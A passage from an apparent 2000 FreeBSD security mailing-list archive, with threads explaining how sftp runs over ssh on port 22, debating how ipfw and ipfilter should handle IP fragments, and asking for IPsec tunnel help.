<961BE653994@stud.alakhawayn.ma> Cc: CrazZzy Slash , freebsd-security@FreeBSD.ORG Subject: Re: Ssh2, sftp port Numbers continue..... Message-ID: <20000904012407.B61559@ringwraith.office1.bg> References: <20000904005915.A61559@ringwraith.office1.bg> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from 961BE653994@stud.alakhawayn.ma on Sun, Sep 03, 2000 at 10:08:49PM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Sep 03, 2000 at 10:08:49PM +0000, Ali Alaoui El Hassani wrote: > Dear All, > > My wonder is that since sftp and ssh use the same port number 22. > > So how do they get dispatched at the level of tcp to the receiving > applicatons sftp and ssh of remote host ? > Please read again what I wrote before :) I wrote that sftp executes the SSH client - thereby the SSH server is executed on the remote side. sftp passes a command to execute to the client, which passes it to the server - and the remote sshd executes the sftp server. - you invoke sftp hostname; - sftp invokes ssh hostname /path/to/sftpserv; - ssh establishes an SSH connection to hostname; - sshd at hostname is executed; - ssh (local) asks you for a password; - sshd (remote) verifies and acknowledges the password; - ssh (local) asks sshd (remote) to execute /path/to/sftpserv; - sshd (remote) executes sftpserv; - sftp (local) talks to ssh (local), which relays to sshd (remote), which is actually already overlaid by sftpserv (remote); - you have an sftp (local) to sftpserv (remote) connection. As you can see, this requires an sshd on the remote side to verify your password/rhosts/shosts/identity-file, and allow you to execute the sftpserv on the remote side. There is no sftpserv service per se, it is just a program that sshd executes. Maybe what you are missing is that you can use SSH to execute just one program on the remote side, rsh style, without actually allocating a virtual terminal, starting a shell, running startup scripts and such. Just try: ssh someuser@somehostname /usr/bin/w ssh connects to sshd, sshd executes /usr/bin/w, w shows some output and the connection is closed. This is exactly the case with sftpserv, only sftpserv does not 'show some output' and die, rather it communicates with the sftp client at your side to let you transfer files any way you want to. Sorry for the long explanation, hope it helped a bit :) G'luck, Peter -- This sentence every third, but it still comprehensible. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 3 15:42: 5 2000 Delivered-To: freebsd-security@freebsd.org Received: from stud.alakhawayn.ma (stud.alakhawayn.ma [193.194.63.94]) by hub.freebsd.org (Postfix) with ESMTP id 1940237B424 for ; Sun, 3 Sep 2000 15:41:59 -0700 (PDT) Received: from localhost (961BE653994@localhost) by stud.alakhawayn.ma (8.9.0/8.9.0) with SMTP id WAA05657; Sun, 3 Sep 2000 22:37:03 GMT Date: Sun, 3 Sep 2000 22:37:03 +0000 (GMT) From: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma> To: Peter Pentchev Cc: CrazZzy Slash , freebsd-security@FreeBSD.ORG Subject: Re: Ssh2, sftp port Numbers continue..... In-Reply-To: <20000904012407.B61559@ringwraith.office1.bg> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dear Sir, I thank you for this long and valuable explanation. It helped me a lot Thank you very much Ali. On Mon, 4 Sep 2000, Peter Pentchev wrote: > On Sun, Sep 03, 2000 at 10:08:49PM +0000, Ali Alaoui El Hassani wrote: > > Dear All, > > > > My wonder is that since sftp and ssh use the same port number 22. > > > > So how do they get dispatched at the level of tcp to the receiving > > applicatons sftp and ssh of remote host ? > > > > Please read again what I wrote before :) > > I wrote that sftp executes the SSH client - thereby the SSH server > is executed on the remote side. sftp passes a command to execute > to the client, which passes it to the server - and the remote sshd > executes the sftp server. > > - you invoke sftp hostname; > - sftp invokes ssh hostname /path/to/sftpserv; > - ssh establishes an SSH connection to hostname; > - sshd at hostname is executed; > - ssh (local) asks you for a password; > - sshd (remote) verifies and acknowledges the password; > - ssh (local) asks sshd (remote) to execute /path/to/sftpserv; > - sshd (remote) executes sftpserv; > - sftp (local) talks to ssh (local), which relays to sshd (remote), > which is actually already overlaid by sftpserv (remote); > - you have an sftp (local) to sftpserv (remote) connection. > > As you can see, this requires an sshd on the remote side to verify > your password/rhosts/shosts/identity-file, and allow you to execute > the sftpserv on the remote side. There is no sftpserv service per se, > it is just a program that sshd executes. > > Maybe what you are missing is that you can use SSH to execute just one > program on the remote side, rsh style, without actually allocating > a virtual terminal, starting a shell, running startup scripts and such. > Just try: > > ssh someuser@somehostname /usr/bin/w > > ssh connects to sshd, sshd executes /usr/bin/w, w shows some output > and the connection is closed. > > This is exactly the case with sftpserv, only sftpserv does not 'show some > output' and die, rather it communicates with the sftp client at your side > to let you transfer files any way you want to. > > Sorry for the long explanation, hope it helped a bit :) > > G'luck, > Peter > > -- > This sentence every third, but it still comprehensible. > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 3 16:18: 5 2000 Delivered-To: freebsd-security@freebsd.org Received: from alcanet.com.au (mail.alcanet.com.au [203.62.196.10]) by hub.freebsd.org (Postfix) with SMTP id 9F35437B424 for ; Sun, 3 Sep 2000 16:18:00 -0700 (PDT) Received: by border.alcanet.com.au id <115345>; Mon, 4 Sep 2000 10:17:27 +1000 Content-return: prohibited Date: Mon, 04 Sep 2000 10:17:41 +1100 From: Peter Jeremy Subject: Re: ipfw and fragments In-reply-to: <200009031727.LAA03881@nomad.yogotech.com>; from nate@yogotech.com on Sun, Sep 03, 2000 at 11:27:46AM -0600 To: Nate Williams Cc: freebsd-security@FreeBSD.ORG Mail-followup-to: Nate Williams , freebsd-security@FreeBSD.ORG Message-Id: <00Sep4.101727est.115345@border.alcanet.com.au> MIME-version: 1.0 Content-type: text/plain; charset=us-ascii Content-disposition: inline User-Agent: Mutt/1.2.4i References: <0009030256211M.20066@smp.kyx.net> <200009031727.LAA03881@nomad.yogotech.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 2000-Sep-03 11:27:46 -0600, Nate Williams wrote: >Actually, isn't the purpose of PMTU to avoid the need to fragment the >packet at intermediate routers? Yes. But I have also used a RAS that just clears the DF bit and fragments the packet anyway. The RAS provider seems unable to understand that this is a problem. Peter To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 3 17:51:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 5466337B422 for ; Sun, 3 Sep 2000 17:51:28 -0700 (PDT) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id UAA75803; Sun, 3 Sep 2000 20:51:08 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Sun, 3 Sep 2000 20:51:08 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Nate Williams Cc: Dragos Ruiu , cjclark@alum.mit.edu, "Crist J . Clark" , Bill Fumerola , Nicolas , freebsd-security@FreeBSD.ORG Subject: Re: ipfw and fragments In-Reply-To: <200009031727.LAA03881@nomad.yogotech.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 3 Sep 2000, Nate Williams wrote: > > My recollection was that fragments can be created that do not contain all > > of the transport-layer headers. For example, although it should not > > occur, ``naturally,'' it is possible to fragment a packet immediately > > after the IP header but before the TCP-level port information is include. > > Similarly, later fragments may begin at arbitrary points in the datagram, > > based on how the PMTU caused the fragmentation at various points on the > > path. > > Actually, isn't the purpose of PMTU to avoid the need to fragment the > packet at intermediate routers? Since PMTU involves both endpoints of > the link, thus allowing the originator to determine *if* a packet of a > particular size can make it all the way from one end to the other w/out > fragmentation. You're thinking of PMTU discovery :-). PMTU is the Pathwise Maximum Transmission Unit. Assuming only single-path routing and a path in a particular direction between two nodes, it's the least member of the set of MTUs traversed between the two hosts. PTMU discovery allows nodes to determine the largest packet size they can send without undergoing fragmentation. It's an estimate as the real PMTU is subject to routing an configuration changes, as well as the vaguarities of multi-path routing. My use of the term PMTU refers to the fact that although you can, in practice, treat the PMTU as constant, if a packet is sent that is too large, it may undergo multiple fragmentation in potentially fairly arbitrary ways, allowing no predictions to be made purely on knowledge of the PMTU. > It seems that fragmentation is a real problem for stateless firewalls, > but is a real problem that should be considered, especially since our > existing IPFW is semi-stateful now. :) Fragmentation is a problem for all firewalls, in as much as (a) ambiguities in the IP spec can cause problems, and (b) without reassembly, it's not clear how policies should apply to fragments. For application proxy firewalls with reassembly, fragmentation is generally not a serious problem, except from the DoS perspective. From the perspective of packet filters, fragmentation can have a variety of nasty effects, ranging from information leakage (refered to by the original poster) to fragmentation attacks that allow the attacker to pass straight through the firewall regardless of policy on the firewall. Many traditional packet filtering firewall products have simply passed fragments un-hindered, relying on filtering on the first fragment to determine policy, assuming the host on the inside of the firewall will be able to handle all remaining cases. In practice, this works very poorly, and for an adequately knowledgeable attacker, is essentially like tissue paper from the protective perspective :-). Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 3 18:19:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.kyx.net (cr95838-b.crdva1.bc.wave.home.com [24.113.50.147]) by hub.freebsd.org (Postfix) with ESMTP id 5D4D837B423; Sun, 3 Sep 2000 18:19:30 -0700 (PDT) Received: from smp.kyx.net (unknown [10.22.22.45]) by mail.kyx.net (Postfix) with SMTP id A5A031DC03; Sun, 3 Sep 2000 18:18:32 -0700 (PDT) From: Dragos Ruiu Organization: kyx.net To: Bill Fumerola , Darren Reed Subject: Re: ipfw and fragments Date: Sun, 3 Sep 2000 17:32:00 -0700 X-Mailer: KYX-CP/M [version core00-mail-92] Content-Type: text/plain Cc: Robert Watson , cjclark@alum.mit.edu, "Crist J . Clark" , Nicolas , freebsd-security@FreeBSD.ORG References: <200009032010.HAA15013@cairo.anu.edu.au> <20000903173136.S33771@jade.chc-chimes.com> In-Reply-To: <20000903173136.S33771@jade.chc-chimes.com> MIME-Version: 1.0 Message-Id: <0009031819571V.20066@smp.kyx.net> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 03 Sep 2000, Bill Fumerola wrote: > On Mon, Sep 04, 2000 at 07:10:46AM +1100, Darren Reed wrote: > > > It never reassembles and doesn't hold them in a buffer until they're > > all received either. > > Which I still think is the proper behavior for both ipfw and ipfilter. > You don't have to buffer until they're reassembled. If you want to be rigorous, you may have to buffer in the case when you don't receive the first segment first (in which case you would have to buffer until you received the first fragment with the headers that will let the firewall decide if it should let the fragments through or not) but in practice this is an extreme corner case, so imho, you can cheat a little and use a heuristic and say you won't buffer and if you don't receive the first frag first too bad (because in practice mis-sequencing almost never occurs in the wild) - I don't know if there are any RFC rules regarding this anyway, so you may even be able to declare this correct behaviour. :-) The only thing you have to store is which fragment addresses you've decided to let through. There is no actual reassembly (or buffering) necessary at the firewall level, just an additional lookup for fragments(and only fragments) but there is a need for some context and state through that lookup. I've been looking at fragmentation for IDSes and my belief is that the performance impact of this feature can be similarly minimized or made negligible if designed correctly into firewalls too. Otherwise, we might as well try to change IP and ban IP level fragmentation, but who knows what breaks then.... And let me paint a scenario of why this might be important because the future may see more fragmentation being used: To achieve high throughput rates without a ridiculous amount of packet overhead on the hosts for high speed networks (think 10GigE) many vendors are talking about increasing max ethernet frame sizes to 64k (I think some already support it). When dealing with monstergrams like that, being able to implement IP level fragmentation is a win for reducing implementation cost and translation. It's conjecture, but it may even become _necessary_ to use fragmentation for achieving high thoughput (use large packet sizes) bridged over legacy smaller ethernet packets at the client interface. I think that firewalls should deal with fragments correctly, because it may become more important in the future, and because the RFCs are written that way today. I'm planning on making sure the next firewall I build (which looks like it's going to be ipf based from what I've learned here) works correctly with regard to this, as to what the remainder of the net does... (But if any patches arise, I'll be glad to provide them to anyone else that shares my opinion about this. :-) cheers, --dr -- dursec.com ltd. / kyx.net - we're from the future pgp fingerprint: 18C7 E37C 2F94 E251 F18E B7DC 2B71 A73E D2E8 A56D pgp key: http://www.dursec.com/drkey.asc To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 3 18:32:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from blackstar.krsu.edu.kg (blackstar.krsu.edu.kg [195.254.161.130]) by hub.freebsd.org (Postfix) with ESMTP id C3A2B37B424 for ; Sun, 3 Sep 2000 18:32:23 -0700 (PDT) Received: from krsu.edu.kg (krsu.edu.kg [195.254.164.3]) by blackstar.krsu.edu.kg (8.9.1a/8.9.1) with ESMTP id IAA09452; Thu, 10 Aug 2000 08:12:48 +0600 (KGST) Received: from localhost (slash@localhost) by krsu.edu.kg (8.9.3/8.9.3) with ESMTP id HAA17311; Mon, 4 Sep 2000 07:35:39 +0600 (KGST) (envelope-from slash@krsu.edu.kg) Date: Mon, 4 Sep 2000 07:35:39 +0600 (KGST) From: CrazZzy Slash To: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma> Cc: freebsd-security@FreeBSD.ORG Subject: Re: Ssh2, sftp port Numbers ??? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Both clients ssh2 and scp connect to one daemon sshd2... and of course you can assign another port... P.S. Sorry for bad English.. :) On Sun, 3 Sep 2000, Ali Alaoui El Hassani wrote: > Dear All, > Thanx to your help successfully installed ssh2. Now i am confused about > one thing. When I use ssh2 or sftp I see that they use the same port > number which is 22. Hum?, my question is: > How to distinguish between the two applications ssh2 and sftp? > is there anyway for me to assign sftp another port number, say 199 ? > > I thank you in Advance > > Ali Alaoui El Hassani > > > > > > On Sun, 20 Aug 2000, CrazZzy Slash wrote: > > > Hi, > > > > Install /usr/ports/security/ssh2. > > > > > > On Sat, 19 Aug 2000, Ali Alaoui El Hassani wrote: > > > > Dear all, > > I need to install > > stlenet, sftp , shttp on a FreeBsd 3.3 > > > > any Help? > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > -- Key fingerprint = 08 2C 60 63 FB DE A5 67 96 38 02 0F FA 9B 81 86 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 3 19:34: 4 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id 4F5EC37B424; Sun, 3 Sep 2000 19:34:02 -0700 (PDT) Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id UAA24829; Sun, 3 Sep 2000 20:33:54 -0600 (MDT) (envelope-from nate@nomad.yogotech.com) Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id UAA12035; Sun, 3 Sep 2000 20:33:53 -0600 (MDT) (envelope-from nate) Date: Sun, 3 Sep 2000 20:33:53 -0600 (MDT) Message-Id: <200009040233.UAA12035@nomad.yogotech.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Bill Fumerola Cc: Darren Reed , Robert Watson , Dragos Ruiu , cjclark@alum.mit.edu, "Crist J . Clark" , Nicolas , freebsd-security@FreeBSD.ORG Subject: Re: ipfw and fragments In-Reply-To: <20000903173136.S33771@jade.chc-chimes.com> References: <200009032010.HAA15013@cairo.anu.edu.au> <20000903173136.S33771@jade.chc-chimes.com> X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Reply-To: nate@yogotech.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > It never reassembles and doesn't hold them in a buffer until they're > > all received either. > > Which I still think is the proper behavior for both ipfw and ipfilter. I can think of some trivially easy DoS attacks if this is done... Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 3 19:50:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from stud.alakhawayn.ma (stud.alakhawayn.ma [193.194.63.94]) by hub.freebsd.org (Postfix) with ESMTP id DA84B37B423 for ; Sun, 3 Sep 2000 19:50:33 -0700 (PDT) Received: from localhost (961BE653994@localhost) by stud.alakhawayn.ma (8.9.0/8.9.0) with SMTP id CAA07850 for ; Mon, 4 Sep 2000 02:46:33 GMT Date: Mon, 4 Sep 2000 02:46:32 +0000 (GMT) From: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma> To: freebsd-security@FreeBSD.ORG Subject: SOS Help ipsec (Esp Ah) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dear All, I am running into trouble. I am using tun0 as tunnel of a secure communication via ESP. I want also to use Ah as another reliable kind of communication so I thaught about using it via tun1. when I wanted to create tun1 i.e (I went to GENERIC and modified the number of tunnels from 1 to 2) and I wanted to recompile the kernel , I had a recompilation error due to some patch that I applied to my kernel previously. well the thing is that I can not use point to point links ie sl0,pp0. Due to time limitations I can not reinstall another kernel. My question is: Do you have any idea on how I can overpass this situation ? I thank you In advance Ali. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 3 20:15:37 2000 Delivered-To: freebsd-security@freebsd.org Received: from stud.alakhawayn.ma (stud.alakhawayn.ma [193.194.63.94]) by hub.freebsd.org (Postfix) with ESMTP id 9759B37B422 for ; Sun, 3 Sep 2000 20:15:32 -0700 (PDT) Received: from localhost (961BE653994@localhost) by stud.alakhawayn.ma (8.9.0/8.9.0) with SMTP id DAA07919; Mon, 4 Sep 2000 03:11:09 GMT Date: Mon, 4 Sep 2000 03:11:09 +0000 (GMT) From: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma> To: CrazZzy Slash Cc: freebsd-security@FreeBSD.ORG Subject: Re: Ssh2, sftp port Numbers ??? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dear Sir, can you tell me about How to assign different port numbers ? I thank you in advance Ali On Mon, 4 Sep 2000, CrazZzy Slash wrote: > Both clients ssh2 and scp connect to one daemon sshd2... and of course you > can assign another port... > > P.S. Sorry for bad English.. :) > > On Sun, 3 Sep 2000, Ali Alaoui El Hassani wrote: > > > Dear All, > > Thanx to your help successfully installed ssh2. Now i am confused about > > one thing. When I use ssh2 or sftp I see that they use the same port > > number which is 22. Hum?, my question is: > > How to distinguish between the two applications ssh2 and sftp? > > is there anyway for me to assign sftp another port number, say 199 ? > > > > I thank you in Advance > > > > Ali Alaoui El Hassani > > > > > > > > > > > > On Sun, 20 Aug 2000, CrazZzy Slash wrote: > > > > > Hi, > > > > > > Install /usr/ports/security/ssh2. > > > > > > > > > On Sat, 19 Aug 2000, Ali Alaoui El Hassani wrote: > > > > > > Dear all, > > > I need to install > > > stlenet, sftp , shttp on a FreeBsd 3.3 > > > > > > any Help? > > > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > -- > > Key fingerprint = 08 2C 60 63 FB DE A5 67 96 38 02 0F FA 9B 81 86 > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 3 20:17:13 2000 Delivered-To: freebsd-security@freebsd.org Received: from stud.alakhawayn.ma (stud.alakhawayn.ma [193.194.63.94]) by hub.freebsd.org (Postfix) with ESMTP id CEB4137B42C for ; Sun, 3 Sep 2000 20:17:06 -0700 (PDT) Received: from localhost (961BE653994@localhost) by stud.alakhawayn.ma (8.9.0/8.9.0) with SMTP id DAA07931; Mon, 4 Sep 2000 03:12:50 GMT Date: Mon, 4 Sep 2000 03:12:50 +0000 (GMT) From: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma> To: CrazZzy Slash Cc: freebsd-security@FreeBSD.ORG Subject: Re: Ssh2, sftp port Numbers ??? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dear Sir, can you tell me about how to assign sftp and ssh and say slogin different port numbers? On Mon, 4 Sep 2000, CrazZzy Slash wrote: > Both clients ssh2 and scp connect to one daemon sshd2... and of course you > can assign another port... > > P.S. Sorry for bad English.. :) > > On Sun, 3 Sep 2000, Ali Alaoui El Hassani wrote: > > > Dear All, > > Thanx to your help successfully installed ssh2. Now i am confused about > > one thing. When I use ssh2 or sftp I see that they use the same port > > number which is 22. Hum?, my question is: > > How to distinguish between the two applications ssh2 and sftp? > > is there anyway for me to assign sftp another port number, say 199 ? > > > > I thank you in Advance > > > > Ali Alaoui El Hassani > > > > > > > > > > > > On Sun, 20 Aug 2000, CrazZzy Slash wrote: > > > > > Hi, > > > > > > Install /usr/ports/security/ssh2. > > > > > > > > > On Sat, 19 Aug 2000, Ali Alaoui El Hassani wrote: > > > > > > Dear all, > > > I need to install > > > stlenet, sftp , shttp on a FreeBsd 3.3 > > > > > > any Help? > > > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > -- > > Key fingerprint = 08 2C 60 63 FB DE A5 67 96 38 02 0F FA 9B 81 86 > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 3 20:46: 0 2000 Delivered-To: freebsd-security@freebsd.org Received: from cairo.anu.edu.au (cairo.anu.edu.au [150.203.224.11]) by hub.freebsd.org (Postfix) with ESMTP id 45C9A37B423; Sun, 3 Sep 2000 20:45:56 -0700 (PDT) Received: (from avalon@localhost) by cairo.anu.edu.au (8.9.3/8.9.3) id OAA24476; Mon, 4 Sep 2000 14:45:41 +1100 (EST) From: Darren Reed Message-Id: <200009040345.OAA24476@cairo.anu.edu.au> Subject: Re: ipfw and fragments To: nate@yogotech.com Date: Mon, 4 Sep 2000 14:45:41 +1100 (Australia/NSW) Cc: billf@chimesnet.com (Bill Fumerola), avalon@coombs.anu.edu.au (Darren Reed), rwatson@FreeBSD.ORG (Robert Watson), dr@kyx.net (Dragos Ruiu), cjclark@alum.mit.edu, cjclark@reflexnet.net (Crist J . Clark), list@rachinsky.de (Nicolas), freebsd-security@FreeBSD.ORG In-Reply-To: <200009040233.UAA12035@nomad.yogotech.com> from "Nate Williams" at Sep 03, 2000 08:33:53 PM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Nate Williams, sie said: > > > > It never reassembles and doesn't hold them in a buffer until they're > > > all received either. > > > > Which I still think is the proper behavior for both ipfw and ipfilter. > > I can think of some trivially easy DoS attacks if this is done... Ummm, what exactly would you be inflicting a DoS attack on ? Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 3 21: 5:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from blackstar.krsu.edu.kg (blackstar.krsu.edu.kg [195.254.161.130]) by hub.freebsd.org (Postfix) with ESMTP id 23DE637B422 for ; Sun, 3 Sep 2000 21:05:41 -0700 (PDT) Received: from krsu.edu.kg (krsu.edu.kg [195.254.164.3]) by blackstar.krsu.edu.kg (8.9.1a/8.9.1) with ESMTP id KAA29989; Thu, 10 Aug 2000 10:46:14 +0600 (KGST) Received: from localhost (slash@localhost) by krsu.edu.kg (8.9.3/8.9.3) with ESMTP id KAA18481; Mon, 4 Sep 2000 10:09:01 +0600 (KGST) (envelope-from slash@krsu.edu.kg) Date: Mon, 4 Sep 2000 10:09:01 +0600 (KGST) From: CrazZzy Slash To: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma> Cc: freebsd-security@FreeBSD.ORG Subject: Re: Ssh2, sftp port Numbers ??? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org different? for what? I mean you can assign another port number for sshd with option sshd -p P.S. Sorry for may bad English.. :) On Mon, 4 Sep 2000, Ali Alaoui El Hassani wrote: > Dear Sir, > can you tell me about How to assign different port numbers ? > > > I thank you in advance > > Ali > > On Mon, 4 Sep 2000, CrazZzy Slash wrote: > > > Both clients ssh2 and scp connect to one daemon sshd2... and of course you > > can assign another port... > > > > P.S. Sorry for bad English.. :) > > > > On Sun, 3 Sep 2000, Ali Alaoui El Hassani wrote: > > > > > Dear All, > > > Thanx to your help successfully installed ssh2. Now i am confused about > > > one thing. When I use ssh2 or sftp I see that they use the same port > > > number which is 22. Hum?, my question is: > > > How to distinguish between the two applications ssh2 and sftp? > > > is there anyway for me to assign sftp another port number, say 199 ? > > > > > > I thank you in Advance > > > > > > Ali Alaoui El Hassani > > > > > > > > > > > > > > > > > > On Sun, 20 Aug 2000, CrazZzy Slash wrote: > > > > > > > Hi, > > > > > > > > Install /usr/ports/security/ssh2. > > > > > > > > > > > > On Sat, 19 Aug 2000, Ali Alaoui El Hassani wrote: > > > > > > > > Dear all, > > > > I need to install > > > > stlenet, sftp , shttp on a FreeBsd 3.3 > > > > > > > > any Help? > > > > > > > > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > > > > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > > > -- > > > > Key fingerprint = 08 2C 60 63 FB DE A5 67 96 38 02 0F FA 9B 81 86 > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > -- Key fingerprint = 08 2C 60 63 FB DE A5 67 96 38 02 0F FA 9B 81 86 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 3 21: 5:59 2000 Delivered-To: freebsd-security@freebsd.org Received: from blackstar.krsu.edu.kg (blackstar.krsu.edu.kg [195.254.161.130]) by hub.freebsd.org (Postfix) with ESMTP id BD4E237B42C for ; Sun, 3 Sep 2000 21:05:47 -0700 (PDT) Received: from krsu.edu.kg (krsu.edu.kg [195.254.164.3]) by blackstar.krsu.edu.kg (8.9.1a/8.9.1) with ESMTP id KAA00139; Thu, 10 Aug 2000 10:46:21 +0600 (KGST) Received: from localhost (slash@localhost) by krsu.edu.kg (8.9.3/8.9.3) with ESMTP id KAA18490; Mon, 4 Sep 2000 10:09:11 +0600 (KGST) (envelope-from slash@krsu.edu.kg) Date: Mon, 4 Sep 2000 10:09:11 +0600 (KGST) From: CrazZzy Slash To: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma> Cc: freebsd-security@FreeBSD.ORG Subject: Re: Ssh2, sftp port Numbers ??? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I think you can't do it.. It's use the same sshd daemon.. of course you can run two sshd daemon on different ports and use one only for ssh and other only for scp.. :)) P.S. Sorry for my bad English.. :) On Mon, 4 Sep 2000, Ali Alaoui El Hassani wrote: > Dear Sir, > can you tell me about how to assign sftp and ssh and say slogin different > port numbers? > > > On Mon, 4 Sep 2000, CrazZzy Slash wrote: > > > Both clients ssh2 and scp connect to one daemon sshd2... and of course you > > can assign another port... > > > > P.S. Sorry for bad English.. :) > > > > On Sun, 3 Sep 2000, Ali Alaoui El Hassani wrote: > > > > > Dear All, > > > Thanx to your help successfully installed ssh2. Now i am confused about > > > one thing. When I use ssh2 or sftp I see that they use the same port > > > number which is 22. Hum?, my question is: > > > How to distinguish between the two applications ssh2 and sftp? > > > is there anyway for me to assign sftp another port number, say 199 ? > > > > > > I thank you in Advance > > > > > > Ali Alaoui El Hassani > > > > > > > > > > > > > > > > > > On Sun, 20 Aug 2000, CrazZzy Slash wrote: > > > > > > > Hi, > > > > > > > > Install /usr/ports/security/ssh2. > > > > > > > > > > > > On Sat, 19 